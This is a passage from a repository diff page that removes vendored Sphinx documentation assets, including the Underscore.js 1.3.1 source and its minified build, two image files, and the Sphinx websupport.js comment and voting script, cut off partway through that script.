// Is the given value a regular expression?
_.isRegExp = function(obj) {
return toString.call(obj) == '[object RegExp]';
};
// Is a given value equal to null?
_.isNull = function(obj) {
return obj === null;
};
// Is a given variable undefined?
_.isUndefined = function(obj) {
return obj === void 0;
};
// Has own property?
_.has = function(obj, key) {
return hasOwnProperty.call(obj, key);
};
// Utility Functions
// -----------------
// Run Underscore.js in *noConflict* mode, returning the `_` variable to its
// previous owner. Returns a reference to the Underscore object.
_.noConflict = function() {
root._ = previousUnderscore;
return this;
};
// Keep the identity function around for default iterators.
_.identity = function(value) {
return value;
};
// Run a function **n** times.
_.times = function (n, iterator, context) {
for (var i = 0; i < n; i++) iterator.call(context, i);
};
// Escape a string for HTML interpolation.
_.escape = function(string) {
return (''+string).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#x27;').replace(/\//g,'&#x2F;');
};
// Add your own custom functions to the Underscore object, ensuring that
// they're correctly added to the OOP wrapper as well.
_.mixin = function(obj) {
each(_.functions(obj), function(name){
addToWrapper(name, _[name] = obj[name]);
});
};
// Generate a unique integer id (unique within the entire client session).
// Useful for temporary DOM ids.
var idCounter = 0;
_.uniqueId = function(prefix) {
var id = idCounter++;
return prefix ? prefix + id : id;
};
// By default, Underscore uses ERB-style template delimiters, change the
// following template settings to use alternative delimiters.
_.templateSettings = {
evaluate : /<%([\s\S]+?)%>/g,
interpolate : /<%=([\s\S]+?)%>/g,
escape : /<%-([\s\S]+?)%>/g
};
// When customizing `templateSettings`, if you don't want to define an
// interpolation, evaluation or escaping regex, we need one that is
// guaranteed not to match.
var noMatch = /.^/;
// Within an interpolation, evaluation, or escaping, remove HTML escaping
// that had been previously added.
var unescape = function(code) {
return code.replace(/\\\\/g, '\\').replace(/\\'/g, "'");
};
// JavaScript micro-templating, similar to John Resig's implementation.
// Underscore templating handles arbitrary delimiters, preserves whitespace,
// and correctly escapes quotes within interpolated code.
_.template = function(str, data) {
var c = _.templateSettings;
var tmpl = 'var __p=[],print=function(){__p.push.apply(__p,arguments);};' +
'with(obj||{}){__p.push(\'' +
str.replace(/\\/g, '\\\\')
.replace(/'/g, "\\'")
.replace(c.escape || noMatch, function(match, code) {
return "',_.escape(" + unescape(code) + "),'";
})
.replace(c.interpolate || noMatch, function(match, code) {
return "'," + unescape(code) + ",'";
})
.replace(c.evaluate || noMatch, function(match, code) {
return "');" + unescape(code).replace(/[\r\n\t]/g, ' ') + ";__p.push('";
})
.replace(/\r/g, '\\r')
.replace(/\n/g, '\\n')
.replace(/\t/g, '\\t')
+ "');}return __p.join('');";
var func = new Function('obj', '_', tmpl);
if (data) return func(data, _);
return function(data) {
return func.call(this, data, _);
};
};
// Add a "chain" function, which will delegate to the wrapper.
_.chain = function(obj) {
return _(obj).chain();
};
// The OOP Wrapper
// ---------------
// If Underscore is called as a function, it returns a wrapped object that
// can be used OO-style. This wrapper holds altered versions of all the
// underscore functions. Wrapped objects may be chained.
var wrapper = function(obj) { this._wrapped = obj; };
// Expose `wrapper.prototype` as `_.prototype`
_.prototype = wrapper.prototype;
// Helper function to continue chaining intermediate results.
var result = function(obj, chain) {
return chain ? _(obj).chain() : obj;
};
// A method to easily add functions to the OOP wrapper.
var addToWrapper = function(name, func) {
wrapper.prototype[name] = function() {
var args = slice.call(arguments);
unshift.call(args, this._wrapped);
return result(func.apply(_, args), this._chain);
};
};
// Add all of the Underscore functions to the wrapper object.
_.mixin(_);
// Add all mutator Array functions to the wrapper.
each(['pop', 'push', 'reverse', 'shift', 'sort', 'splice', 'unshift'], function(name) {
var method = ArrayProto[name];
wrapper.prototype[name] = function() {
var wrapped = this._wrapped;
method.apply(wrapped, arguments);
var length = wrapped.length;
if ((name == 'shift' || name == 'splice') && length === 0) delete wrapped[0];
return result(wrapped, this._chain);
};
});
// Add all accessor Array functions to the wrapper.
each(['concat', 'join', 'slice'], function(name) {
var method = ArrayProto[name];
wrapper.prototype[name] = function() {
return result(method.apply(this._wrapped, arguments), this._chain);
};
});
// Start chaining a wrapped Underscore object.
wrapper.prototype.chain = function() {
this._chain = true;
return this;
};
// Extracts the result from a wrapped and chained object.
wrapper.prototype.value = function() {
return this._wrapped;
};
}).call(this);

31
docs/build/html/_static/underscore.js vendored
Unescape View File

@ -1,31 +0,0 @@
// Underscore.js 1.3.1
// (c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
// Underscore is freely distributable under the MIT license.
// Portions of Underscore are inspired or borrowed from Prototype,
// Oliver Steele's Functional, and John Resig's Micro-Templating.
// For all details and documentation:
// http://documentcloud.github.com/underscore
(function(){function q(a,c,d){if(a===c)return a!==0||1/a==1/c;if(a==null||c==null)return a===c;if(a._chain)a=a._wrapped;if(c._chain)c=c._wrapped;if(a.isEqual&&b.isFunction(a.isEqual))return a.isEqual(c);if(c.isEqual&&b.isFunction(c.isEqual))return c.isEqual(a);var e=l.call(a);if(e!=l.call(c))return false;switch(e){case "[object String]":return a==String(c);case "[object Number]":return a!=+a?c!=+c:a==0?1/a==1/c:a==+c;case "[object Date]":case "[object Boolean]":return+a==+c;case "[object RegExp]":return a.source==
c.source&&a.global==c.global&&a.multiline==c.multiline&&a.ignoreCase==c.ignoreCase}if(typeof a!="object"||typeof c!="object")return false;for(var f=d.length;f--;)if(d[f]==a)return true;d.push(a);var f=0,g=true;if(e=="[object Array]"){if(f=a.length,g=f==c.length)for(;f--;)if(!(g=f in a==f in c&&q(a[f],c[f],d)))break}else{if("constructor"in a!="constructor"in c||a.constructor!=c.constructor)return false;for(var h in a)if(b.has(a,h)&&(f++,!(g=b.has(c,h)&&q(a[h],c[h],d))))break;if(g){for(h in c)if(b.has(c,
h)&&!f--)break;g=!f}}d.pop();return g}var r=this,G=r._,n={},k=Array.prototype,o=Object.prototype,i=k.slice,H=k.unshift,l=o.toString,I=o.hasOwnProperty,w=k.forEach,x=k.map,y=k.reduce,z=k.reduceRight,A=k.filter,B=k.every,C=k.some,p=k.indexOf,D=k.lastIndexOf,o=Array.isArray,J=Object.keys,s=Function.prototype.bind,b=function(a){return new m(a)};if(typeof exports!=="undefined"){if(typeof module!=="undefined"&&module.exports)exports=module.exports=b;exports._=b}else r._=b;b.VERSION="1.3.1";var j=b.each=
b.forEach=function(a,c,d){if(a!=null)if(w&&a.forEach===w)a.forEach(c,d);else if(a.length===+a.length)for(var e=0,f=a.length;e<f;e++){if(e in a&&c.call(d,a[e],e,a)===n)break}else for(e in a)if(b.has(a,e)&&c.call(d,a[e],e,a)===n)break};b.map=b.collect=function(a,c,b){var e=[];if(a==null)return e;if(x&&a.map===x)return a.map(c,b);j(a,function(a,g,h){e[e.length]=c.call(b,a,g,h)});if(a.length===+a.length)e.length=a.length;return e};b.reduce=b.foldl=b.inject=function(a,c,d,e){var f=arguments.length>2;a==
null&&(a=[]);if(y&&a.reduce===y)return e&&(c=b.bind(c,e)),f?a.reduce(c,d):a.reduce(c);j(a,function(a,b,i){f?d=c.call(e,d,a,b,i):(d=a,f=true)});if(!f)throw new TypeError("Reduce of empty array with no initial value");return d};b.reduceRight=b.foldr=function(a,c,d,e){var f=arguments.length>2;a==null&&(a=[]);if(z&&a.reduceRight===z)return e&&(c=b.bind(c,e)),f?a.reduceRight(c,d):a.reduceRight(c);var g=b.toArray(a).reverse();e&&!f&&(c=b.bind(c,e));return f?b.reduce(g,c,d,e):b.reduce(g,c)};b.find=b.detect=
function(a,c,b){var e;E(a,function(a,g,h){if(c.call(b,a,g,h))return e=a,true});return e};b.filter=b.select=function(a,c,b){var e=[];if(a==null)return e;if(A&&a.filter===A)return a.filter(c,b);j(a,function(a,g,h){c.call(b,a,g,h)&&(e[e.length]=a)});return e};b.reject=function(a,c,b){var e=[];if(a==null)return e;j(a,function(a,g,h){c.call(b,a,g,h)||(e[e.length]=a)});return e};b.every=b.all=function(a,c,b){var e=true;if(a==null)return e;if(B&&a.every===B)return a.every(c,b);j(a,function(a,g,h){if(!(e=
e&&c.call(b,a,g,h)))return n});return e};var E=b.some=b.any=function(a,c,d){c||(c=b.identity);var e=false;if(a==null)return e;if(C&&a.some===C)return a.some(c,d);j(a,function(a,b,h){if(e||(e=c.call(d,a,b,h)))return n});return!!e};b.include=b.contains=function(a,c){var b=false;if(a==null)return b;return p&&a.indexOf===p?a.indexOf(c)!=-1:b=E(a,function(a){return a===c})};b.invoke=function(a,c){var d=i.call(arguments,2);return b.map(a,function(a){return(b.isFunction(c)?c||a:a[c]).apply(a,d)})};b.pluck=
function(a,c){return b.map(a,function(a){return a[c]})};b.max=function(a,c,d){if(!c&&b.isArray(a))return Math.max.apply(Math,a);if(!c&&b.isEmpty(a))return-Infinity;var e={computed:-Infinity};j(a,function(a,b,h){b=c?c.call(d,a,b,h):a;b>=e.computed&&(e={value:a,computed:b})});return e.value};b.min=function(a,c,d){if(!c&&b.isArray(a))return Math.min.apply(Math,a);if(!c&&b.isEmpty(a))return Infinity;var e={computed:Infinity};j(a,function(a,b,h){b=c?c.call(d,a,b,h):a;b<e.computed&&(e={value:a,computed:b})});
return e.value};b.shuffle=function(a){var b=[],d;j(a,function(a,f){f==0?b[0]=a:(d=Math.floor(Math.random()*(f+1)),b[f]=b[d],b[d]=a)});return b};b.sortBy=function(a,c,d){return b.pluck(b.map(a,function(a,b,g){return{value:a,criteria:c.call(d,a,b,g)}}).sort(function(a,b){var c=a.criteria,d=b.criteria;return c<d?-1:c>d?1:0}),"value")};b.groupBy=function(a,c){var d={},e=b.isFunction(c)?c:function(a){return a[c]};j(a,function(a,b){var c=e(a,b);(d[c]||(d[c]=[])).push(a)});return d};b.sortedIndex=function(a,
c,d){d||(d=b.identity);for(var e=0,f=a.length;e<f;){var g=e+f>>1;d(a[g])<d(c)?e=g+1:f=g}return e};b.toArray=function(a){return!a?[]:a.toArray?a.toArray():b.isArray(a)?i.call(a):b.isArguments(a)?i.call(a):b.values(a)};b.size=function(a){return b.toArray(a).length};b.first=b.head=function(a,b,d){return b!=null&&!d?i.call(a,0,b):a[0]};b.initial=function(a,b,d){return i.call(a,0,a.length-(b==null||d?1:b))};b.last=function(a,b,d){return b!=null&&!d?i.call(a,Math.max(a.length-b,0)):a[a.length-1]};b.rest=
b.tail=function(a,b,d){return i.call(a,b==null||d?1:b)};b.compact=function(a){return b.filter(a,function(a){return!!a})};b.flatten=function(a,c){return b.reduce(a,function(a,e){if(b.isArray(e))return a.concat(c?e:b.flatten(e));a[a.length]=e;return a},[])};b.without=function(a){return b.difference(a,i.call(arguments,1))};b.uniq=b.unique=function(a,c,d){var d=d?b.map(a,d):a,e=[];b.reduce(d,function(d,g,h){if(0==h||(c===true?b.last(d)!=g:!b.include(d,g)))d[d.length]=g,e[e.length]=a[h];return d},[]);
return e};b.union=function(){return b.uniq(b.flatten(arguments,true))};b.intersection=b.intersect=function(a){var c=i.call(arguments,1);return b.filter(b.uniq(a),function(a){return b.every(c,function(c){return b.indexOf(c,a)>=0})})};b.difference=function(a){var c=b.flatten(i.call(arguments,1));return b.filter(a,function(a){return!b.include(c,a)})};b.zip=function(){for(var a=i.call(arguments),c=b.max(b.pluck(a,"length")),d=Array(c),e=0;e<c;e++)d[e]=b.pluck(a,""+e);return d};b.indexOf=function(a,c,
d){if(a==null)return-1;var e;if(d)return d=b.sortedIndex(a,c),a[d]===c?d:-1;if(p&&a.indexOf===p)return a.indexOf(c);for(d=0,e=a.length;d<e;d++)if(d in a&&a[d]===c)return d;return-1};b.lastIndexOf=function(a,b){if(a==null)return-1;if(D&&a.lastIndexOf===D)return a.lastIndexOf(b);for(var d=a.length;d--;)if(d in a&&a[d]===b)return d;return-1};b.range=function(a,b,d){arguments.length<=1&&(b=a||0,a=0);for(var d=arguments[2]||1,e=Math.max(Math.ceil((b-a)/d),0),f=0,g=Array(e);f<e;)g[f++]=a,a+=d;return g};
var F=function(){};b.bind=function(a,c){var d,e;if(a.bind===s&&s)return s.apply(a,i.call(arguments,1));if(!b.isFunction(a))throw new TypeError;e=i.call(arguments,2);return d=function(){if(!(this instanceof d))return a.apply(c,e.concat(i.call(arguments)));F.prototype=a.prototype;var b=new F,g=a.apply(b,e.concat(i.call(arguments)));return Object(g)===g?g:b}};b.bindAll=function(a){var c=i.call(arguments,1);c.length==0&&(c=b.functions(a));j(c,function(c){a[c]=b.bind(a[c],a)});return a};b.memoize=function(a,
c){var d={};c||(c=b.identity);return function(){var e=c.apply(this,arguments);return b.has(d,e)?d[e]:d[e]=a.apply(this,arguments)}};b.delay=function(a,b){var d=i.call(arguments,2);return setTimeout(function(){return a.apply(a,d)},b)};b.defer=function(a){return b.delay.apply(b,[a,1].concat(i.call(arguments,1)))};b.throttle=function(a,c){var d,e,f,g,h,i=b.debounce(function(){h=g=false},c);return function(){d=this;e=arguments;var b;f||(f=setTimeout(function(){f=null;h&&a.apply(d,e);i()},c));g?h=true:
a.apply(d,e);i();g=true}};b.debounce=function(a,b){var d;return function(){var e=this,f=arguments;clearTimeout(d);d=setTimeout(function(){d=null;a.apply(e,f)},b)}};b.once=function(a){var b=false,d;return function(){if(b)return d;b=true;return d=a.apply(this,arguments)}};b.wrap=function(a,b){return function(){var d=[a].concat(i.call(arguments,0));return b.apply(this,d)}};b.compose=function(){var a=arguments;return function(){for(var b=arguments,d=a.length-1;d>=0;d--)b=[a[d].apply(this,b)];return b[0]}};
b.after=function(a,b){return a<=0?b():function(){if(--a<1)return b.apply(this,arguments)}};b.keys=J||function(a){if(a!==Object(a))throw new TypeError("Invalid object");var c=[],d;for(d in a)b.has(a,d)&&(c[c.length]=d);return c};b.values=function(a){return b.map(a,b.identity)};b.functions=b.methods=function(a){var c=[],d;for(d in a)b.isFunction(a[d])&&c.push(d);return c.sort()};b.extend=function(a){j(i.call(arguments,1),function(b){for(var d in b)a[d]=b[d]});return a};b.defaults=function(a){j(i.call(arguments,
1),function(b){for(var d in b)a[d]==null&&(a[d]=b[d])});return a};b.clone=function(a){return!b.isObject(a)?a:b.isArray(a)?a.slice():b.extend({},a)};b.tap=function(a,b){b(a);return a};b.isEqual=function(a,b){return q(a,b,[])};b.isEmpty=function(a){if(b.isArray(a)||b.isString(a))return a.length===0;for(var c in a)if(b.has(a,c))return false;return true};b.isElement=function(a){return!!(a&&a.nodeType==1)};b.isArray=o||function(a){return l.call(a)=="[object Array]"};b.isObject=function(a){return a===Object(a)};
b.isArguments=function(a){return l.call(a)=="[object Arguments]"};if(!b.isArguments(arguments))b.isArguments=function(a){return!(!a||!b.has(a,"callee"))};b.isFunction=function(a){return l.call(a)=="[object Function]"};b.isString=function(a){return l.call(a)=="[object String]"};b.isNumber=function(a){return l.call(a)=="[object Number]"};b.isNaN=function(a){return a!==a};b.isBoolean=function(a){return a===true||a===false||l.call(a)=="[object Boolean]"};b.isDate=function(a){return l.call(a)=="[object Date]"};
b.isRegExp=function(a){return l.call(a)=="[object RegExp]"};b.isNull=function(a){return a===null};b.isUndefined=function(a){return a===void 0};b.has=function(a,b){return I.call(a,b)};b.noConflict=function(){r._=G;return this};b.identity=function(a){return a};b.times=function(a,b,d){for(var e=0;e<a;e++)b.call(d,e)};b.escape=function(a){return(""+a).replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#x27;").replace(/\//g,"&#x2F;")};b.mixin=function(a){j(b.functions(a),
function(c){K(c,b[c]=a[c])})};var L=0;b.uniqueId=function(a){var b=L++;return a?a+b:b};b.templateSettings={evaluate:/<%([\s\S]+?)%>/g,interpolate:/<%=([\s\S]+?)%>/g,escape:/<%-([\s\S]+?)%>/g};var t=/.^/,u=function(a){return a.replace(/\\\\/g,"\\").replace(/\\'/g,"'")};b.template=function(a,c){var d=b.templateSettings,d="var __p=[],print=function(){__p.push.apply(__p,arguments);};with(obj||{}){__p.push('"+a.replace(/\\/g,"\\\\").replace(/'/g,"\\'").replace(d.escape||t,function(a,b){return"',_.escape("+
u(b)+"),'"}).replace(d.interpolate||t,function(a,b){return"',"+u(b)+",'"}).replace(d.evaluate||t,function(a,b){return"');"+u(b).replace(/[\r\n\t]/g," ")+";__p.push('"}).replace(/\r/g,"\\r").replace(/\n/g,"\\n").replace(/\t/g,"\\t")+"');}return __p.join('');",e=new Function("obj","_",d);return c?e(c,b):function(a){return e.call(this,a,b)}};b.chain=function(a){return b(a).chain()};var m=function(a){this._wrapped=a};b.prototype=m.prototype;var v=function(a,c){return c?b(a).chain():a},K=function(a,c){m.prototype[a]=
function(){var a=i.call(arguments);H.call(a,this._wrapped);return v(c.apply(b,a),this._chain)}};b.mixin(b);j("pop,push,reverse,shift,sort,splice,unshift".split(","),function(a){var b=k[a];m.prototype[a]=function(){var d=this._wrapped;b.apply(d,arguments);var e=d.length;(a=="shift"||a=="splice")&&e===0&&delete d[0];return v(d,this._chain)}});j(["concat","join","slice"],function(a){var b=k[a];m.prototype[a]=function(){return v(b.apply(this._wrapped,arguments),this._chain)}});m.prototype.chain=function(){this._chain=
true;return this};m.prototype.value=function(){return this._wrapped}}).call(this);

BIN
docs/build/html/_static/up-pressed.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 345 B

BIN
docs/build/html/_static/up.png vendored
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 345 B

808
docs/build/html/_static/websupport.js vendored
Unescape View File

@ -1,808 +0,0 @@
/*
* websupport.js
* ~~~~~~~~~~~~~
*
* sphinx.websupport utilties for all documentation.
*
* :copyright: Copyright 2007-2016 by the Sphinx team, see AUTHORS.
* :license: BSD, see LICENSE for details.
*
*/
(function($) {
$.fn.autogrow = function() {
return this.each(function() {
var textarea = this;
$.fn.autogrow.resize(textarea);
$(textarea)
.focus(function() {
textarea.interval = setInterval(function() {
$.fn.autogrow.resize(textarea);
}, 500);
})
.blur(function() {
clearInterval(textarea.interval);
});
});
};
$.fn.autogrow.resize = function(textarea) {
var lineHeight = parseInt($(textarea).css('line-height'), 10);
var lines = textarea.value.split('\n');
var columns = textarea.cols;
var lineCount = 0;
$.each(lines, function() {
lineCount += Math.ceil(this.length / columns) || 1;
});
var height = lineHeight * (lineCount + 1);
$(textarea).css('height', height);
};
})(jQuery);
(function($) {
var comp, by;
function init() {
initEvents();
initComparator();
}
function initEvents() {
$(document).on("click", 'a.comment-close', function(event) {
event.preventDefault();
hide($(this).attr('id').substring(2));
});
$(document).on("click", 'a.vote', function(event) {
event.preventDefault();
handleVote($(this));
});
$(document).on("click", 'a.reply', function(event) {
event.preventDefault();
openReply($(this).attr('id').substring(2));
});
$(document).on("click", 'a.close-reply', function(event) {
event.preventDefault();
closeReply($(this).attr('id').substring(2));
});
$(document).on("click", 'a.sort-option', function(event) {
event.preventDefault();
handleReSort($(this));
});
$(document).on("click", 'a.show-proposal', function(event) {
event.preventDefault();
showProposal($(this).attr('id').substring(2));
});
$(document).on("click", 'a.hide-proposal', function(event) {
event.preventDefault();
hideProposal($(this).attr('id').substring(2));
});
$(document).on("click", 'a.show-propose-change', function(event) {
event.preventDefault();
showProposeChange($(this).attr('id').substring(2));
});
$(document).on("click", 'a.hide-propose-change', function(event) {
event.preventDefault();
hideProposeChange($(this).attr('id').substring(2));
});
$(document).on("click", 'a.accept-comment', function(event) {
event.preventDefault();
acceptComment($(this).attr('id').substring(2));
});
$(document).on("click", 'a.delete-comment', function(event) {
event.preventDefault();
deleteComment($(this).attr('id').substring(2));
});
$(document).on("click", 'a.comment-markup', function(event) {
event.preventDefault();
toggleCommentMarkupBox($(this).attr('id').substring(2));
});
}
/**
* Set comp, which is a comparator function used for sorting and
* inserting comments into the list.
*/
function setComparator() {
// If the first three letters are "asc", sort in ascending order
// and remove the prefix.
if (by.substring(0,3) == 'asc') {
var i = by.substring(3);
comp = function(a, b) { return a[i] - b[i]; };
} else {
// Otherwise sort in descending order.
comp = function(a, b) { return b[by] - a[by]; };
}
// Reset link styles and format the selected sort option.
$('a.sel').attr('href', '#').removeClass('sel');
$('a.by' + by).removeAttr('href').addClass('sel');
}
/**
* Create a comp function. If the user has preferences stored in
* the sortBy cookie, use those, otherwise use the default.
*/
function initComparator() {
by = 'rating'; // Default to sort by rating.
// If the sortBy cookie is set, use that instead.
if (document.cookie.length > 0) {
var start = document.cookie.indexOf('sortBy=');
if (start != -1) {
start = start + 7;
var end = document.cookie.indexOf(";", start);
if (end == -1) {
end = document.cookie.length;
by = unescape(document.cookie.substring(start, end));
}
}
}
setComparator();
}
/**
* Show a comment div.
*/
function show(id) {
$('#ao' + id).hide();
$('#ah' + id).show();
var context = $.extend({id: id}, opts);
var popup = $(renderTemplate(popupTemplate, context)).hide();
popup.find('textarea[name="proposal"]').hide();
popup.find('a.by' + by).addClass('sel');
var form = popup.find('#cf' + id);
form.submit(function(event) {
event.preventDefault();
addComment(form);
});
$('#s' + id).after(popup);
popup.slideDown('fast', function() {
getComments(id);
});
}
/**
* Hide a comment div.
*/
function hide(id) {
$('#ah' + id).hide();
$('#ao' + id).show();
var div = $('#sc' + id);
div.slideUp('fast', function() {
div.remove();
});
}
/**
* Perform an ajax request to get comments for a node
* and insert the comments into the comments tree.
*/
function getComments(id) {
$.ajax({
type: 'GET',
url: opts.getCommentsURL,
data: {node: id},
success: function(data, textStatus, request) {
var ul = $('#cl' + id);
var speed = 100;
$('#cf' + id)
.find('textarea[name="proposal"]')
.data('source', data.source);
if (data.comments.length === 0) {
ul.html('<li>No comments yet.</li>');
ul.data('empty', true);
} else {
// If there are comments, sort them and put them in the list.
var comments = sortComments(data.comments);
speed = data.comments.length * 100;
appendComments(comments, ul);
ul.data('empty', false);
}
$('#cn' + id).slideUp(speed + 200);
ul.slideDown(speed);
},
error: function(request, textStatus, error) {
showError('Oops, there was a problem retrieving the comments.');
},
dataType: 'json'
});
}
/**
* Add a comment via ajax and insert the comment into the comment tree.
*/
function addComment(form) {
var node_id = form.find('input[name="node"]').val();
var parent_id = form.find('input[name="parent"]').val();
var text = form.find('textarea[name="comment"]').val();
var proposal = form.find('textarea[name="proposal"]').val();
if (text == '') {
showError('Please enter a comment.');
return;
}
// Disable the form that is being submitted.
form.find('textarea,input').attr('disabled', 'disabled');
// Send the comment to the server.
$.ajax({
type: "POST",
url: opts.addCommentURL,
dataType: 'json',
data: {
node: node_id,
parent: parent_id,
text: text,
proposal: proposal
},
success: function(data, textStatus, error) {
// Reset the form.
if (node_id) {
hideProposeChange(node_id);
}
form.find('textarea')
.val('')
.add(form.find('input'))
.removeAttr('disabled');
var ul = $('#cl' + (node_id || parent_id));
if (ul.data('empty')) {
$(ul).empty();
ul.data('empty', false);
}
insertComment(data.comment);
var ao = $('#ao' + node_id);
ao.find('img').attr({'src': opts.commentBrightImage});
if (node_id) {
// if this was a "root" comment, remove the commenting box
// (the user can get it back by reopening the comment popup)
$('#ca' + node_id).slideUp();
}
},
error: function(request, textStatus, error) {
form.find('textarea,input').removeAttr('disabled');
showError('Oops, there was a problem adding the comment.');
}
});
}
/**
* Recursively append comments to the main comment list and children
* lists, creating the comment tree.
*/
function appendComments(comments, ul) {
$.each(comments, function() {
var div = createCommentDiv(this);
ul.append($(document.createElement('li')).html(div));
appendComments(this.children, div.find('ul.comment-children'));
// To avoid stagnating data, don't store the comments children in data.
this.children = null;
div.data('comment', this);
});
}
/**
* After adding a new comment, it must be inserted in the correct
* location in the comment tree.
*/
function insertComment(comment) {
var div = createCommentDiv(comment);
// To avoid stagnating data, don't store the comments children in data.
comment.children = null;
div.data('comment', comment);
var ul = $('#cl' + (comment.node || comment.parent));
var siblings = getChildren(ul);
var li = $(document.createElement('li'));
li.hide();
// Determine where in the parents children list to insert this comment.
for(i=0; i < siblings.length; i++) {
if (comp(comment, siblings[i]) <= 0) {
$('#cd' + siblings[i].id)
.parent()
.before(li.html(div));
li.slideDown('fast');
return;
}
}
// If we get here, this comment rates lower than all the others,
// or it is the only comment in the list.
ul.append(li.html(div));
li.slideDown('fast');
}
function acceptComment(id) {
$.ajax({
type: 'POST',
url: opts.acceptCommentURL,
data: {id: id},
success: function(data, textStatus, request) {
$('#cm' + id).fadeOut('fast');
$('#cd' + id).removeClass('moderate');
},
error: function(request, textStatus, error) {
showError('Oops, there was a problem accepting the comment.');
}
});
}
function deleteComment(id) {
$.ajax({
type: 'POST',
url: opts.deleteCommentURL,
data: {id: id},
success: function(data, textStatus, request) {
var div = $('#cd' + id);
if (data == 'delete') {
// Moderator mode: remove the comment and all children immediately
div.slideUp('fast', function() {
div.remove();
});
return;
}
// User mode: only mark the comment as deleted
div
.find('span.user-id:first')
.text('[deleted]').end()
.find('div.comment-text:first')
.text('[deleted]').end()
.find('#cm' + id + ', #dc' + id + ', #ac' + id + ', #rc' + id +
', #sp' + id + ', #hp' + id + ', #cr' + id + ', #rl' + id)
.remove();
var comment = div.data('comment');
comment.username = '[deleted]';
comment.text = '[deleted]';
div.data('comment', comment);
},
error: function(request, textStatus, error) {
showError('Oops, there was a problem deleting the comment.');
}
});
}
function showProposal(id) {
$('#sp' + id).hide();
$('#hp' + id).show();
$('#pr' + id).slideDown('fast');
}
function hideProposal(id) {
$('#hp' + id).hide();
$('#sp' + id).show();
$('#pr' + id).slideUp('fast');
}
function showProposeChange(id) {
$('#pc' + id).hide();
$('#hc' + id).show();
var textarea = $('#pt' + id);
textarea.val(textarea.data('source'));
$.fn.autogrow.resize(textarea[0]);
textarea.slideDown('fast');
}
function hideProposeChange(id) {
$('#hc' + id).hide();
$('#pc' + id).show();
var textarea = $('#pt' + id);
textarea.val('').removeAttr('disabled');
textarea.slideUp('fast');
}
function toggleCommentMarkupBox(id) {
$('#mb' + id).toggle();
}
/** Handle when the user clicks on a sort by link. */
function handleReSort(link) {
var classes = link.attr('class').split(/\s+/);
for (var i=0; i<classes.length; i++) {
if (classes[i] != 'sort-option') {
by = classes[i].substring(2);
}
}
setComparator();
// Save/update the sortBy cookie.
var expiration = new Date();
expiration.setDate(expiration.getDate() + 365);
document.cookie= 'sortBy=' + escape(by) +
';expires=' + expiration.toUTCString();
$('ul.comment-ul').each(function(index, ul) {
var comments = getChildren($(ul), true);
comments = sortComments(comments);
appendComments(comments, $(ul).empty());
});
}
/**
* Function to process a vote when a user clicks an arrow.
*/
function handleVote(link) {
if (!opts.voting) {
showError("You'll need to login to vote.");
return;
}
var id = link.attr('id');
if (!id) {
// Didn't click on one of the voting arrows.
return;
}
// If it is an unvote, the new vote value is 0,
// Otherwise it's 1 for an upvote, or -1 for a downvote.
var value = 0;
if (id.charAt(1) != 'u') {
value = id.charAt(0) == 'u' ? 1 : -1;
}
// The data to be sent to the server.
var d = {
comment_id: id.substring(2),
value: value
};
// Swap the vote and unvote links.
link.hide();
$('#' + id.charAt(0) + (id.charAt(1) == 'u' ? 'v' : 'u') + d.comment_id)
.show();
// The div the comment is displayed in.
var div = $('div#cd' + d.comment_id);
var data = div.data('comment');
// If this is not an unvote, and the other vote arrow has
// already been pressed, unpress it.
if ((d.value !== 0) && (data.vote === d.value * -1)) {
$('#' + (d.value == 1 ? 'd' : 'u') + 'u' + d.comment_id).hide();
$('#' + (d.value == 1 ? 'd' : 'u') + 'v' + d.comment_id).show();
}
// Update the comments rating in the local data.
data.rating += (data.vote === 0) ? d.value : (d.value - data.vote);
data.vote = d.value;
div.data('comment', data);
// Change the rating text.
div.find('.rating:first')
.text(data.rating + ' point' + (data.rating == 1 ? '' : 's'));
// Send the vote information to the server.
$.ajax({
type: "POST",
url: opts.processVoteURL,
data: d,
error: function(request, textStatus, error) {
showError('Oops, there was a problem casting that vote.');
}
});
}
/**
* Open a reply form used to reply to an existing comment.
*/
function openReply(id) {
// Swap out the reply link for the hide link
$('#rl' + id).hide();
$('#cr' + id).show();
// Add the reply li to the children ul.
var div = $(renderTemplate(replyTemplate, {id: id})).hide();
$('#cl' + id)
.prepend(div)
// Setup the submit handler for the reply form.
.find('#rf' + id)
.submit(function(event) {
event.preventDefault();
addComment($('#rf' + id));
closeReply(id);
})
.find('input[type=button]')
.click(function() {
closeReply(id);
});
div.slideDown('fast', function() {
$('#rf' + id).find('textarea').focus();
});
}
/**
* Close the reply form opened with openReply.
*/
function closeReply(id) {
// Remove the reply div from the DOM.
$('#rd' + id).slideUp('fast', function() {
$(this).remove();
});
// Swap out the hide link for the reply link
$('#cr' + id).hide();
$('#rl' + id).show();
}
/**
* Recursively sort a tree of comments using the comp comparator.
*/
function sortComments(comments) {
comments.sort(comp);
$.each(comments, function() {
this.children = sortComments(this.children);
});
return comments;
}
/**
* Get the children comments from a ul. If recursive is true,
* recursively include childrens' children.
*/
function getChildren(ul, recursive) {
var children = [];
ul.children().children("[id^='cd']")
.each(function() {
var comment = $(this).data('comment');
if (recursive)
comment.children = getChildren($(this).find('#cl' + comment.id), true);
children.push(comment);
});
return children;
}
/** Create a div to display a comment in. */
function createCommentDiv(comment) {
if (!comment.displayed && !opts.moderator) {
return $('<div class="moderate">Thank you! Your comment will show up '
+ 'once it is has been approved by a moderator.</div>');
}
// Prettify the comment rating.
comment.pretty_rating = comment.rating + ' point' +
(comment.rating == 1 ? '' : 's');
// Make a class (for displaying not yet moderated comments differently)
comment.css_class = comment.displayed ? '' : ' moderate';
// Create a div for this comment.
var context = $.extend({}, opts, comment);
var div = $(renderTemplate(commentTemplate, context));
// If the user has voted on this comment, highlight the correct arrow.
if (comment.vote) {
var direction = (comment.vote == 1) ? 'u' : 'd';
div.find('#' + direction + 'v' + comment.id).hide();
div.find('#' + direction + 'u' + comment.id).show();
}
if (opts.moderator || comment.text != '[deleted]') {
div.find('a.reply').show();
if (comment.proposal_diff)
div.find('#sp' + comment.id).show();
if (opts.moderator && !comment.displayed)
div.find('#cm' + comment.id).show();
if (opts.moderator || (opts.username == comment.username))
